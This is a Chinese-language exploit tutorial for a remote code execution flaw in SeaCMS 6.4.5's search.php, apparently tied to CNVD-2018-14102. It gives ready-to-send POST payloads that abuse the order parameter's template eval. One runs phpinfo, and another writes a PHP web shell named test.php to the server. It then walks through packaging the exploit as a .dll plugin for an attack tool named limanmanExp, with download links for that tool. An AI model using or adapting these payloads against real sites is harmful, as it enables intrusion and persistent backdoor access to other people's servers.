SeaCms6.4.5存在远程代码执行漏洞。
注:工具地址
更新4.2版本
链接:https://pan.baidu.com/s/1j-dMtJYiOk2Pfo7QoEXHMA
提取码:rw8l
https://wws.lanzous.com/b01zycnta
密码:g3uz
开发手册地址:https://www.kancloud.cn/qq496672097/limanmanexp
漏洞点存在于search.php中。
漏洞的主要成因
search.php调用_RunMagicQuotes方法,将全局变量注册成变量。
在searchPHP中 echoSearchPage过滤不严,且直接将$order参数进行注册。
最后使用模板echoSearchPage()方法进行翻译,翻译的过程中使用模板标签,即可达到翻译之后的模板是PHP代码的目的。由于echoSearchPage()方法中的规定,代码中包含if的部分才能够被当作php代码进行解析。并且使用eval进行代码执行。所以还需要进行代码组装。
具体代码审计部分请参阅网络资料。
复现
搭建环境
使用Phpmystudy 进行搭建。 注意点:不能使用php7进行复现 。seacms仅支持非PHP7版本。
构造Post请求包
由已经公开的漏洞信息可以知道,触发点在search.php 。该PHP是首页的搜索功能。 计划使用burpsuit直接拦截数据包进行修改。
修改数据包内容
添加body内容为
searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}
searchtype=5&searchword=d&order=}{end if}{if:1)print_r($_POST[func]($_POST[cmd]));//}{end if}&func=assert&cmd=fwrite(fopen("test.php","w"),'<?php eval($_POST["pass"]);?>')
发送即可生成文件名为test.php的木马文件。
limanmanExp插件制作
下载模板
https://www.kancloud.cn/qq496672097/limanmanexp/2139154
创建一个.net framework 4 库文件
下载模板,替换原有代码
设置class名称
设置class名称为CNVD_2018_14102
设置url
设置url为url["url"]+="/search.php"
设置body
需要注意的是, 这里的
searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}
searchtype=5&searchword=d&order=}{end if}{if:1)print_r($_POST[func]($_POST[cmd]));//}{end if}&func=assert&cmd=fwrite(fopen("test.php","w"),'<?php eval($_POST["pass"]);?>')
VS会自动给你添加空格, 需要手动修正。 另外也需要注意转义“等特殊字符。
设置header
由于是需要上传POST数据,那么就必须设置ContentType等头部。 需要注意的是, 这里的头部类型没有-,具体哪些头名称没有-,请参考手册
设置请求方式
请求方式与请求次数有关, 具体的请求关系图如下:
由于没有多次请求我们可以不管上面的图
直接将numberOfTime修改为2即可。
生成.dll文件。
点击 ”生成“-》”重新生成解决方案“即可在项目的bin->debug目录获得dll文件, 放入工具的插件目录即可
测试
由于只使用了一Poc开头的方法。 那么在工具中也只能点击POC按钮。
测试效果如下
